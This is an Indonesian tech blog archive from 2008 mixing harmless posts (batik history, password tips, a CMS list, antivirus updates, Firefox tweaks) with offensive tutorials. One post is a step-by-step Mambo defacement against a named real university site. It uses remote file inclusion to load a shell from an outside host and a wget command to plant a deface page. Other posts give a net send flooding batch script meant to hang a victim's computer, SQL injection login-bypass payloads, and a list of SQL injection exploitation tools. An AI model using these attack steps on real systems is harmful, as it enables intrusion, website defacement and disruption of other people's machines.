Tuesday, July 29, 2008

Batik Lampung Bukan Sembagi

. Tuesday, July 29, 2008
1 comments

KHAZANAH seni kerajinan batik Indonesia tidak pernah mencatat keberadaan Batik Lampung. Kebudayaan Lampung hanya meninggalkan tapis (kain tenun ikat), palepai (kain kapal), dan sulam usus yang bersifat religius. Kain ini dikerjakan secara turun-temurun oleh satu masyarakat adat.

Batik Lampung lahir melalui proses panjang yang dijalani Andriand Damiri Sangadjie budayawan yang memiliki tempat tinggal di aspol. Untuk mematangkan teknologi membatik, pelukis ini menimba ilmu mulai dari Yogyakarta, Solo, Bali, hingga ke Cina, Thailand, Jepang, Malabar, dan Turki.

Setelah melewati berbagai percobaan dengan rekan-rekannya di Balai Riset Penelitian Batik (sekarang Balai Besar Kerajinan dan Batik) Yogyakarta, untuk pertama kalinya Andriand menemukan seni kerajinan batik Lampung pada 1978. Selanjutnya, ia mulai memproduksi batik tulis ini di Metro pada 9 Mei 1978, bertepatan dengan ulang tahun ke-4 putra sulungnya.

Ternyata, karya-karyanya banyak menarik perhatian, termasuk almarhum R. Soekirno, mantan Bupati Lampung Tengah saat itu. Soekirno juga yang kemudian meresmikan batik-batik karya Andriand sebagai Batik Lampung pada 24 Mei 1980.

Sebagai sebuah karya, Batik Lampung juga adalah satu-satunya industri kerajinan dan karya seni saat ini yang telah memperoleh pengakuan nasional dan hak paten (hak atas kekayaan intelektual/HAKI-RI), dengan patents pending HAKI-RI-242526-2005.

Jika Batik Lampung sudah memiliki paten sendiri, lalu bagaimana dengan sembagi yang juga disebut-sebut sebagai batik Lampung? Secara tegas, Andriand mengatakan sembagi bukanlah batik Lampung. Tapi, kain khas coromandel cloths dari India.

"Dalam literatur, disebutkan kain sembagi (bukan sebagi) adalah kain khas coromandel cloths, yaitu tekstil yang berasal dari Coromandel Coast, India. Dan, bukan batik Lampung. Tapi, kok sekarang jadi Batik Lampung? Dari mana itu? Suatu pemberdosaan budayakah?" tegas Andriand.

Dalam sejarah batik, kata Andriand, Lampung tidak memiliki batik. Kain sembagi yang disebut batik Lampung itu sebenarnya tidak ada bedanya dengan batik di Jawa, yang juga disebut serasah atau kumitir. Kain bermotif geometris ini mulai dipopulerkan di Sumatera Selatan pada abad ke-15 yang pada masa itu pemasarannya di monopoli oleh VOC (De Vereenigde Oost Indische Companie).

"Di Lampung, kain ini kemudian lazim dipakai sebagai penutup jenazah sebelum dikebumikan," kata Andriand.
Jadi, apa sih batik? kutipan dari Lampos.

Klik disini untuk melanjutkan »»

Friday, July 18, 2008

Tips membuat password yang sulit dibobol hacker

. Friday, July 18, 2008
0 comments

Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:

1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

* 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
* password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
* tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

* menggunakan semua huruf kecil.
* menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
* mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
2. Panjang lebih dari 10 karakter.
3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

* 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
* mAu = mau
* $ = uang
* 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

* ninG = misalnya nama orang sepesial buat Anda: Naning
* -> = panah identik dengan adalah
* 0+ = lambang cewek
* 1 =berarti nomor satu atau paling
* Gul = gula itu manis

Beberapa tips:

1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
* seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
* admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Penulis: Oka Mahendra

Klik disini untuk melanjutkan »»

Daftar CMS berdasarkan kategori

.
2 comments

Listing CMS berdasarkan kategori dan sekaligus situs developernya.

Ads Management:
Openads http://www.openads.org/
phpList http://www.phplist.com/

BBS/Forum/Message Boards:
Aterr http://chimaera.starglade.org/aterr
bbPress http://www.bbpress.org/
Ekinboard http://www.ekinboard.com/
FUDforum http://www.fudforum.org/
MyBB http://www.mybboard.com/
miniBB http://www.minibb.net/
Phorum http://www.phorum.org/
phpBB3 http://www.phpbb.com/
PunBB http://www.punbb.org/
SMF http://www.simplemachines.org/
UNB http://newsboard.unclassified.de
UseBB http://www.usebb.net/
Vanilla http://www.getvanilla.com/
W-agora http://www.w-agora.net/
Xchangeboard http://www.xchangeboard.de/
XMB Forum http://www.xmbforum.com/
Yappa-ng http://www.zirkon.at/
YetAnotherForum http://www.yetanotherforum.net/

Blogs:
b2evolution http://www.b2evolution.net/
bBlog http://www.bblog.com/
BirdBlog http://www.birdblog.org/
BLOG:CMS http://www.blogcms.com/
blur6ex http://www.blursoft.com/
boastMachine http://www.boastology.com/
DotClear http://www.dotclear.net/
feedonfeeds http://www.feedonfeeds.com/
LifeType http://www.lifetype.net/
Loudblog http://www.loudblog.de/
Nucleus http://www.nucleuscms.org/
Pixelpost http://www.pixelpost.org/
pMachine Free http://www.pmachine.com/
reBlog http://www.reblog.org/
sBLOG http://www.servous.se/
Serendipity http://www.s9y.org/
Simplog http://www.simplog.org/
Textpattern http://www.textpattern.com/
TruBlog http://www.trublog.org/
Wheatblog http://wheatblog.sourceforge.net
WordPress http://www.wordpress.org/
WordPress MU http://mu.wordpress.org
WordPattern http://www.wordpattern.org/

Calendars:
Maian Events http://www.maianscriptworld.co.uk/

Clasified Ads:
Classifieds http://classifieds.phpoutsourcing.com

CMS/Portals:
Bitweaver http://www.bitweaver.org/
CivicSpace http://www.civicspacelabs.org/
Clever Copy http://clevercopy.bestdirectbuy.com
CMS Made Simple http://www.cmsmadesimple.org/
Community Server http://www.communityserver.org/
Contenido http://www.contenido.org/
Dragonfly CMS http://www.cpgnuke.com/
Dev http://dev-wms.sourceforge.net
DotNetNuke (DNN) http://www.dotnetnuke.com/
Drupal http://www.drupal.org/
e107 http://www.e107.org/
EcwCMS http://www.ecwcms.com/
Exponent http://www.exponentcms.org/
eZ publish http://www.ez.no/
Fundanemt http://www.fundanemt.com/
fuzzylime http://www.fuzzylime.co.uk/
Geeklog http://www.geeklog.net/
IndexScript http://www.indexscript.com/
Indexu http://www.nicecoder.com/
Jaws http://www.jaws.com.mx/
Jetbox http://jetbox.streamedge.com
Joomla! http://www.joomla.com/ atau http://www.joomla.org/ *koreksi dari dwikristianto*
Jupiter http://www.highstrike.net/
Mambo Open Source http://www.mamboserver.com/
MDPro http://www.maxdev.com/
MODx http://www.modxcms.com/
Moodle http://www.moodle.org/
Netious http://www.netious.com/
OneCMS http://www.insanevisions.com/
Open-Realty http://www.open-realty.org/
Ovidentia http://www.ovidentia.org/
Papoo http://www.papoo.de/
PHP-Fusion http://www.php-fusion.co.uk/
PHP-Nuke http://www.phpnuke.org/
PhpComasy http://www.phpcomasy.org/
phpLinkDirectory http://www.phplinkdirectory.com/
phpSlash http://www.php-slash.org/
phpWCMS http://www.phpwcms.de/
phpWebSite http://phpwebsite.appstate.edu
PHPX http://www.phpx.org/
Plume CMS http://www.plume-cms.net/
Post-Nuke http://www.postnuke.com/
PROPS http://props.sourceforge.net
Siteframe http://www.siteframe.org/
SPIP http://www.spip.net/
toendaCMS http://www.toenda.com/
Typo3 http://www.typo3.org/
vtiger http://www.vtiger.com/
Website Baker 2 http://www.websitebaker.org/
Xaraya http://www.xaraya.com/
Xoops http://www.xoops.org/
YACS http://www.yetanothercommunitysystem.com/

Customer Support:
Crafty Syntax Live Help http://www.craftysyntax.com/
Help Center Live http://www.helpcenterlive.com/
osTicket http://www.osticket.com/
PerlDesk (Commercial, needs license) http://www.perldesk.com/
PHP Support Tickets http://www.triangle-solutions.com/
phpMyChat http://www.phpheaven.net/
PHPTickets http://www.phpsupporttickets.com/
Support Logic Helpdesk http://www.support-logic.com/
Support Services Manager http://scripts.sheddtech.com

E-Commerce:
CubeCart http://www.cubecart.com/
Osc2nuke http://www.osc2nuke.com/
OSCommerce http://www.oscommerce.com/
OSCommRes http://www.oscommres.com/
PHPAdsNew http://www.openx.org/
PHPauction http://www.phpauction.org/
phpShop http://www.phpshop.org/
SugarCRM http://www.sugarforge.org/
ZenCart http://www.zen-cart.com/

FAQ:
FAQMasterFlex http://www.technetguru.net/
phpMyFAQ http://www.phpmyfaq.de/

GroupWare Tools Project Managements
:
ACollab http://www.atutor.ca/
dotProject http://www.dotproject.net/
eGroupWare http://www.egroupware.org/
netOffice http://netoffice.sourceforge.net
phpGroupWare http://www.phpgroupware.org/
PHProject http://www.phprojekt.com/
PMTool http://www.pmtool.org/

Guestbooks:
MJguest http://www.mdsjack.bo.it/
ViPER Guestbook http://www.vipergb.de.vu/

Hosting Billing:
AccountLab Plus http://www.netenberg.com/
phpCOIN http://www.phpcoin.com/
phpFormGenerator http://phpformgen.sourceforge.net

Image Galleries:
4images Gallery http://www.4homepages.de/
Coppermine Photo Gallery http://coppermine.sourceforge.net
DAlbum http://www.dalbum.org/
Gallery http://gallery.menalto.com
Gallery2 http://codex.gallery2.org
JAlbum http://www.jalbum.net/
LinPHA http://linpha.sourceforge.net
MG2 http://www.minigal.dk/
Plogger http://www.plogger.org/
Singapore http://singapore.sourceforge.net
Snipe Gallery http://www.snipegallery.com/
WEBalbum http://www.web-album.org/

Mailing List:
PHPlist http://www.tincan.co.uk/

Polls and Surveys:
phpESP http://phpesp.sourceforge.net
PHPSurveyor http://phpsurveyor.sourceforge.net

Search Engine:
Copernic http://www.copernic.com/

Site Builders:
Soholaunch Pro Edition
(Commercial, needs license) http://www.soholaunch.com/
Templates Express http://www.netenberg.com/

Social Bookmarking:
PLIGG htpp://www.pligg.com/ *tambahan dari 2mk*

Website Add-Ons:
Aardvark Topsites PHP http://www.aardvarktopsites.com/
ObieWebsite.sf.net http://obiewebsite.sourceforge.net
Perl Script Page http://www.proxy2.de/

Wiki:
DokuWiki http://wiki.splitbrain.org/
ErfurtWiki http://erfurtwiki.sourceforge.net
MediaWiki http://www.mediawiki.org/
PhpWiki http://phpwiki.sourceforge.net
PmWiki http://www.pmwiki.org/
QwikiWiki http://www.qwikiwiki.com/
TikiWiki http://www.tikiwiki.org/
UniWakka http://uniwakka.sourceforge.net
WackoWiki http://www.wackowiki.com/
WikkaWiki http://www.wikkawiki.org/
Wikepage http://www.wikepage.org/
WikkiTikkiTavi http://tavi.sourceforge.net
WikiWikiWeb http://www.phpwiki.org/

Other Scripts:
All Free Download Script by Category http://www.download3000.com/scriptsall.html *tambahan dari tanahsirah*
Comic Update Script (phpComic) http://cusp.sourceforge.net
Dew-NewPHPLinks http://www.dew-code.com/
evoDev http://www.evo-dev.com/
Factory Nova http://www.factorynova.com/
FormMail http://www.formmail.com/
Matt’s Script Archive http://www.scriptarchive.com/
Noah’s Classifieds http://classifieds.phpoutsourcing.com
openDB http://opendb.iamvegan.net
phpArena http://www.phparena.net/
phpCollab http://www.php-collab.com/
phpmycounter http://www.timlinden.com/
SiteBar http://www.sitebar.org/
sRecommender http://www.biglickmedia.com/
WebCalendar http://webcalendar.sourceforge.net
WebCards http://www.mywebcards.net/

source: adsense-sby.com

Klik disini untuk melanjutkan »»

PC MAV 15 dengan Librari ClamAV

.
0 comments


PC Media Antivirus (PCMAV) 15 Tak Afdhol bila tidak dilengkapi batabase ClamAV
download untuk mendapatkan PC Media Antivirus (PC MAV) 15 plus library ClamAV

Download:

Bagi yang meminta file libpclamav.dll, selain dengan mendownload file ini, dapat juga didownload di sini. Ini salah satu file yang diperlukan untuk mengkolaborasikan PCMAV dengan clamAV. Letakkan libpclamav.dll bersama file main.cvd dan daily.cvd yang didownload ke dalam direktori PCMAV.

Klik disini untuk melanjutkan »»

Monday, July 7, 2008

PCMAV 1.4 Update Build 2

. Monday, July 7, 2008
1 comments


Ada 10 virus baru yang banyak dilaporkan menyebar di Indonesia ditambahkan pada Update Build2 kali ini. Bagi Anda pengguna PCMAV 1.4 sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi. Jadi total tambahan virus sampai Update Build2 kali ini adalah sebanyak 15 virus.

Untuk mendapatkan dan menggunakan update PCMAV ini, pastikan terlebih dahulu PCMAV RealTime Protector tidak sedang aktif. Jika iya, Anda harus menutup aplikasi tersebut terlebih dahulu. Lalu Anda cukup menjalankan PCMAV Cleaner (PCMAV-CLN.exe), tentunya komputer harus dalam keadaan aktif terhubung ke Internet (non-proxy). Fitur GetUpdates dari PCMAV secara otomatis akan memberikan alamat internet yang aktif di mana Anda bisa men-download file update tersebut. Letakkan file hasil download tersebut (PCMAV.vdb) ke dalam folder di mana PCMAV berada. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Namun bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa alamat ini: GudangUpload.com, SendSpace.com, atau Badongo.com (mirror).



Akan ada tulisan Godham. Virus yang memiliki ukuran sekitar 260Kb, murni tanpa di-packing ini dibuat menggunakan Visual Basic. Ia dapat merusak file-file Anda dengan menginfeksinya. File yang dapat ia infeksi adalah file gambar dengan extension .JPG dan file dokumen Word .DOC. Ia pun memiliki kemampuan untuk mengubah iconnya mengikuti file yang sedang diinfeksikannya, menjadi seperti file gambar, file dokumen Word, atau mirip folder. Virus ini akan menampakan diri dengan menampilkan tulisan “Ilegal program…….” pada aplikasi yang tidak diinginkannya. Dan jika pada properties file, di bagian Version Information terdapat kata-kata “Thank’s try is program is fun “GODHAM”“.

Daftar tambahan virus PCMAV 1.4 Update Build2:
Ang.vbs.B
Aniee.J
Boenk
Boenk.vbs
Cyrax-Tutor
Fisika
Godham
Godham.exe.A
Godham.exe.B
Godham.Inf
Kalong.vbs.E
Kalong.vbs.E.inf
Robert
Semut
Semut.vbs

download antivirus PCMAV 1.4 Update Build 2 ==>> disini
sumber : Virus Indonesia / pcmav.biz

Klik disini untuk melanjutkan »»

Sunday, July 6, 2008

Free SQL Injection Scanner

. Sunday, July 6, 2008
2 comments

SQL Injection merupakan teknik hacking paling populer pada aplikasi web dengan prinsip melewatkan perintah-perintah SQL lewat aplikasi web untuk dieksekusi oleh database back-end. Kelemahan akan muncul apabila inputan user tidak disaring/difilter dengan sempurna dan akhirnya dieksekusi.

Mengidentifikasi kelemahan SQL Injection akan melibatkan proses auditing aplikasi web secara keseluruhan, cara paling ampuhdan efektif menurut security-hacks.com adalah dengan menggunakan SQL Injection Scanner. Beberapa diantaranya:

SQLIer: mengambil URL yang vulnerable dan mencoba mendapatkan semua informasi untuk mengeksploit kelemahan tanpa membutuhkan interaksi user.
SQLbftools: kumpulan tools untuk memperoleh informasi MySQL dengan menggunakan teknik Blind SQL Injection.
SQLNinja: tool yang memanfaatkan kelemahan SQL Injection pada aplikasi web berbasis Microsoft SQL Server sebagai database back-end.


SQL Injection Brute-forcer
SQLBrute
BobCat
SQLMap
Absinthe
SQL Injection Pen-testing Tool
SQID
Blind SQL Injection Perl Tool
SQL Power Injection
FJ-Injector Framework
Automagic SQL Injector
NGSS SQL Injector

Klik disini untuk melanjutkan »»

Flooding Jaringan

.
1 comments

Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.

Nah, alasannya ada beragam. Bisa karena kesal dengan calon korban, bisa karena sekedar iseng, bisa karena ingin nambah ilmu aja, ato alasan apa aja. Tapi untuk jawaban yang pertama, akan saya beri sedikit turorial berupa scriptnya.

OK..!!! ikuti langkah2 berikut ini :

1. Run command prompt/cmd anda, caranya klik start > run > cmd
2. Saat command prompt anda muncul, ketik edit hi.bat
3. Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :

net send [ipkomputer]/[namakomputer] hi
call hi.bat

kemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

* hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.
* jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.
* cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan
* yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

Klik disini untuk melanjutkan »»

Tehnik SQL Injection

.
1 comments

TEHNIK SQL INJECTION
Kata hacker pada jaman sekarang ini sudah tidak asing lagi ditelinga kita khususnya dunia information technology (IT) dan hacker yang dulu dipandang sebagai penjahat, pencuri atau pembobol suatu system komputer sekarang sudah bergeser , keberadaan hacker yang identik dengan aktifitas underground kini sudah mulai menampakan diri, sebagai contoh dinegara negara maju , perusahaan perusahaan besar yang mempunyai system komputer yang besar sudah mulai menyewa hacker hacker untuk mencari kelemahan kelemahan system mereka.

SQL INJECTION
Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs
KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan
teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port
port yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool .ke situs tersebut yang
konon system yang seharga 152 milyar itu keamanannya berlapis lapis
Apa yang penulis bahas ini adalah basic atau dasar dasar dari teknik hacking yang
dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang
terproteksi sebagai siapa saja dengan hanya mengetahui username tanpa harus
mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui
username dan password sama sekali
Diilustrasikan STMIK-IM mempunyai situs dengan nama www.stmik-im.ac.id , untuk
mengelola situs ini administrator membuat halaman web untuk atifitas update semua
halaman web sehingga bisa dikelola darimanapun dan kapanpun , halaman web tersebut
tersimpan di www.stmik-im.ac.id/admin.asp , untuk mengamankan halaman2 yang
dikhususkan untuk web administrator ini , web admin membuat halaman web yang
terproteksi yang berfungsi sebagai pintu masuk ke halama2 berikutnya ,sehingga setiap
user yang akan masuk ke halaman halaman yang terproteksi harus memasukan username
dan password mereka , daftar password dan user tersebut tersimpan dalam sql server
dengan nama table admin dengan field field diantaranya username dan password.
Statement sql bukanlah bahasa pemrograman seperti pascal,Delphi atau visual basic ,
statemen sql biasanya digunakan bersama sama dengan bahasa pemrograman lain pada
saat mengakses database , pada ilustrasi diatas , untuk mencocokan user yang login ,
maka digunakan statemen sql yang kurang lebih sebagai berikut
Select * from admin where username = input_username
And password = input_password
Sebagai contoh apabila penulis sebagai administrator dengan username = administrator
dan password = admin bermaksud login maka sql statemennya sebagai berikut
Select * from admin where username = ‘administrator’ and
Password = ‘admin’
Dapat dipastikan bahwa apabila field username terdapat record administrator dengan filed
password terdapat admin penulis dapat melewati proteksi dan masuk kehalaman
berikutnya ,akan tetapi apabila sebaliknya ,maka akan keluar pesan kesalahan yang
kurang lebih isinya kita tidak bisa masuk ke halaman berikutnya , lalu bagaimana kalau
penulis memasukan input ‘ or ‘’=’ pada username dan password , perhatikan perubahan
statemen sql berikut ini
Select * from admin where username = ‘’ or ‘’ = ‘’ and
Password = ‘’ or ‘’=’’
Logika OR menyebabkan statement membalikan nilai false jadi true sehingga kita bisa
masuk sebagai user yang terdapat pada record pertama dalam table admin ( record
pertama biasanya administrator) , dan bagaimana kalo kita hanya mengetahui username
saja tapi passwordnya tidak , misalkan username = administrator , caranya cukup
sederhana , pada text box tempat menginput username isi dengan “administrator’—“
sedangkan pada textbox password boleh diisi sembarang misalkan ‘ or ‘’=’ maka
statement sql akan berubah menjadi
Select * from admin where username = ‘ administrator ‘—“
And password = ‘’ or ‘’=’’
Tanda “—“ (dua tanda minus) di sql server berarti akhir dari statement sql sehingga
perintah dibelakannya tidak dieksekusi lagi.
Untuk web admin , bagaimana cara mencegahnya , jangan izinkan user menginput
selain karakter a - z atau A - Z atau 0 – 9 , selain dari pada itu ditolak pada saat
pengecekan.

ditulis oleh:Slamet Risnanto

Klik disini untuk melanjutkan »»

Login dengan 2 id di (yahoo messenger)

.
0 comments

Tips login Yahoo Messenger dengan 2 account berbeda di satu komputer
pastikan YM anda sudah terinstal di komputer anda dan dalam kondisi off



1. Buka Start —–> RUN ——–> REGEDIT
2. Kemudian buka HKEY_CURRENT_USER —-> software —–> yahoo —-> pager —-> test
3. Lalu Tekan enter 2 x dan berikan nilai 1
4. Kemudian buka YM anda dan jangan login dulu
5. Buka lagi YM anda

Sekarang anda dapat Chatting di YM dengan menggunakan 2 account yahoo yang berbeda di satu komputer.

SELAMAT MENCOBA

Klik disini untuk melanjutkan »»

Deface situs Mambo

.
1 comments

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://sukan.upm.edu.my/Buletin/index.php?option=com_content&task=view&id=17&Itemid=2

2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?

3. Masukkan bug ini di belakang situs tadi :

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm?

5. Di kolom Execute Command ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /opt/orion

7. Masukkan file deface ini :

http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

8. Di kolom Execute Command ketik :

cd /opt/orion;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing. kutipan dari J4mbi H4ck3r

Klik disini untuk melanjutkan »»

Langkah Melindungi 'Data Rahasia' di Situs Web

.
0 comments

Dalam sebuah hosting atau web server, seringkali ditemui banyak folder-folder. Kebanyakan berupa folder penyimpanan Content Management System (CMS) atau aplikasi dan plugins.

Namun, adakalanya juga seorang user menyimpan data dalam folder di web server atau hosting. Tujuannya, untuk berbagi file dengan orang lain.

Misalnya, Anda meletakkan dalam folder Data_Rahasia. Kemudian link atau URL lokasinya dibagi ke orang lain agar bisa diunduh. Alamatnya adalah www.webanda.com/Data_Rahasia/.

Fenomena yang (sayangnya) kerap dilakukan di situs 'pelat merah' ini sebenarnya sangat beresiko. Bisa jadi, dengan bantuan mesin pencari, data yang kita simpan diambil oleh orang yang tidak diharapkan.

Untuk mencegah hal itu, ada sebuah cara yang bisa digunakan. Hanya dengan membuat sebuah file sederhana. Sebuah file yang lazim dikenal dengan nama .htaccess.

Dengan file .htaccess, maka file dalam folder penyimpanan tidak bisa dibuka melalui browser. Hanya bisa dibuka menggunakan aplikasi File Transfer Protocol (FTP) atau melalui fitur File Manager dalam control panel hosting.

Berikut ini langkah-langkahnya:

#Pertama, membuat file .htaccess.

* Bukalah aplikasi editor teks yang biasa Anda pakai.
* Pengguna Windows bisa menggunakan Notepad, pengguna Linux bisa menggunakan Text Editor atau perintah vi dalam console mode. Sedangkan pengguna Mac bisa menggunakan TextEdit.

* Isikan baris-baris perintah ini:

AuthType Basic
AuthName “Test .htaccess”
Require user test

* Simpan file ini dengan nama .htaccess. Jika tidak diizinkan oleh sistem operasi Anda menyimpan file bernama .htaccess, simpan saja dalam nama yang lain.

#Kedua, upload file .htaccess dalam folder yang ingin Anda lindungi.

* Dalam hal ini di www.webanda.com/Data_Rahasia/.
* Upload biasanya dilakukan menggunakan FTP.
* Setelah selesai, ubah nama file menjadi .htaccess.

Voila! Folder Anda (www.webanda.com/Data_Rahasia/) sudah tidak bisa diakses sekarang. dikutip dari detiknet

Klik disini untuk melanjutkan »»

Mempercepat Browser Firefox

.
0 comments

Bagi pengguna Firefox yang ingin menambah kecepatan browser, metode-metode berikut ini bisa dicoba

Metode 1:

1. Buka browser Mozilla Firefox.
2. Ketik 'about:config' pada address bar, lalu tekan enter.
3. Turunkan halaman sampai Anda menemukan kalimat 'browser.tabs.showSingleWindowsModePrefs', lalu double klik sehingga settingannya menjadi 'true'.
4. Turunkan lagi halaman Firefox sampai Anda menemukan baris berbunyi 'network.http.pipelining', lalu double klik sehingga settingannya juga menjadi 'true'.
5. Terakhir, turunkan lagi halaman Firefox dan carilah baris yang berbunyi 'network.http.pipelining.maxrequests', lalu double klik. Anda akan disuguhi sebuah window pop up. Ubahlah angka di pop up itu menjadi 60. Kemudian tekanlah 'Ok'.
6. Tutup Firefox lalu coba buka kembali. Jika tidak ada masalah, Firefox Anda akan terbuka 10-40 persen lebih cepat daripada sebelumnya dengan langkah-langkah seperti di atas.

Metode 2:

Langkah mujarab lain untuk meningkatkan kecepatan Firefox adalah dengan menggunakan add-on untuk Firefox bernama FasterFox. FasterFox ini membuat pemakaian bandwidth lebih efektif sehingga bisa mempercepat performa Firefox. Anda bisa mendownload FasterFox di alamat: http://fasterfox.mozdev.org. dikutip dari detiknet

Klik disini untuk melanjutkan »»

4 Column Template for Blogger

.
1 comments


Bagi yang gemar gonta-ganti template blogger, mungkin ini bisa jadi salah satu alternatif pilihan. yaitu empat kolom blogger template. apalagi bagi yang blognya dipasangi adsense. buat yang kepingin donload templatenya bisa lansung download aja disini

Klik disini untuk melanjutkan »»

Dasar-dasar Hacking SQL injection

.
0 comments


SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

